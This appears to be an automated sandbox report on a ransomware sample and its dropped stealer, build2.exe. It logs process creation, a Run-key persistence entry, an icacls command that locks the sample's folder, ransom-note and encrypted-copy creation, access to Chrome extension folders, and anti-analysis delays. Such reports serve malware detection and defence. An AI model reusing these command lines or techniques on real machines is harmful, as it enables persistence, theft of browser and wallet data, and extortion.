Source: unknown Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe"
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe --Task
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\Desktop\2OmglUwx83.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 1_2_0040D240
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409909 GetCursorInfo,CharUpperA,GetConsoleAliasesLengthW,GetDefaultCommConfigW,GetProfileSectionA,_puts,GetFileInformationByHandle,_realloc,_realloc,_realloc,_fseek,SetCalendarInfoA,SetCalendarInfoA,SetCurrentDirectoryW,BuildCommDCBAndTimeoutsW,CreateFileW,OpenJobObjectA,WriteConsoleOutputCharacterA,MapUserPhysicalPages,AddAtomA,GetThreadPriority,GetFullPathNameA,FindNextVolumeMountPointW,FillConsoleOutputCharacterA,EnumResourceNamesW,OpenWaitableTimerW,LocalSize,_hwrite,GetPrivateProfileStructA,GetComputerNameW,EnumDateFormatsExA,GetConsoleAliasesW,GetComputerNameW,GetConsoleTitleA,GetSystemWindowsDirectoryW,SetCalendarInfoA,GetFileAttributesA,HeapFree,lstrcpyW,LocalAlloc,GetConsoleFontSize,EnumDateFormatsA,ConvertThreadToFiber,InterlockedCompareExchange,VerifyVersionInfoA,FormatMessageW,SetCommState,FindResourceA,CreateMutexA,MoveFileA,LockFileEx,ResetEvent,FindNextFileW,GetComputerNameExA,CopyFileW,FileTimeToSystemTime,EnumSystemLocalesA,GetComputerNameW,WriteConsoleA,GlobalGetAtomNameW,LoadLibraryA,SetConsoleWindowInfo,GetCPInfoExW,EnumResourceLanguagesA,TerminateThread,GetDiskFreeSpaceExW,GetPrivateProfileStructW,GetConsoleAliasW,lstrcpyA,GetOEMCP,ExitThread, 0_2_00409909
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00412440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle, 1_2_00412440
Source: C:\Users\user\Desktop\2OmglUwx83.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\Desktop\2OmglUwx83.exe Command line argument: velavedub 0_2_00409909
Source: 2OmglUwx83.exe String found in binary or memory: set-addPolicy
Source: 2OmglUwx83.exe String found in binary or memory: id-cmc-addExtensions
Source: 2OmglUwx83.exe String found in binary or memory: set-addPolicy
Source: 2OmglUwx83.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 2OmglUwx83.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 2OmglUwx83.exe, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\bocepe redipov\son kihaseleyadej54\p.pdb source: build2.exe, 0000000C.00000000.393039147.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000C.00000002.412815687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000D.00000000.403227306.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe.8.dr, build2[1].exe.8.dr
Source: Binary string: C:\bukasilo15\tili 3.pdb source: 2OmglUwx83.exe
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 2OmglUwx83.exe, 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: ?"C:\bocepe redipov\son kihaseleyadej54\p.pdb source: build2.exe, 0000000C.00000000.393039147.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000C.00000002.412815687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000D.00000000.403227306.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe.8.dr, build2[1].exe.8.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Unpacked PE file: 13.2.build2.exe.60900000.1.unpack
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040AC18 push eax; ret 0_2_0040AC36
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022B8F05 push ecx; ret 0_2_022B8F18
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00428565 push ecx; ret 1_2_00428578
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409508 LoadLibraryA,GetProcAddress,VirtualProtect, 0_2_00409508
Source: 2OmglUwx83.exe Static PE information: section name: .vegoda
Source: 2OmglUwx83.exe Static PE information: section name: .vujate
Source: 2OmglUwx83.exe Static PE information: section name: .kab
Source: 2OmglUwx83.exe Static PE information: section name: .gamo
Source: build2.exe.8.dr Static PE information: section name: .zonami
Source: build2.exe.8.dr Static PE information: section name: .yosozi
Source: build2.exe.8.dr Static PE information: section name: .may
Source: build2[1].exe.8.dr Static PE information: section name: .zonami
Source: build2[1].exe.8.dr Static PE information: section name: .yosozi
Source: build2[1].exe.8.dr Static PE information: section name: .may
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe.vvyu (copy)
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Temp\tmpEAC.tmp
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Temp\CR_14C6C.tmp\setup.exe
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temp\CR_14C6C.tmp\setup.exe.vvyu (copy)
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temp\tmpEAC.tmp.vvyu (copy)
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\_readme.txt
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\_readme.txt
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\2OmglUwx83.exe TID: 2812 Thread sleep time: -1260000s >= -30000s
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe TID: 5700 Thread sleep count: 71 > 30
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe TID: 5700 Thread sleep time: -71000s >= -30000s
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\2OmglUwx83.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\2OmglUwx83.exe Thread delayed: delay time: 1260000
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe.vvyu (copy)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_14C6C.tmp\setup.exe
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpEAC.tmp
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\CR_14C6C.tmp\setup.exe.vvyu (copy)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmpEAC.tmp.vvyu (copy)
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 1_2_0040E670
Source: C:\Users\user\Desktop\2OmglUwx83.exe Thread delayed: delay time: 1260000
Source: C:\Users\user\Desktop\2OmglUwx83.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\2OmglUwx83.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: 2OmglUwx83.exe, 00000008.00000003.382867470.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.616576425.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.428058702.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.431151606.0000000000619000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409508 LoadLibraryA,GetProcAddress,VirtualProtect, 0_2_00409508
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_02290042 push dword ptr fs:[00000030h] 0_2_02290042
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040F520 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040F520
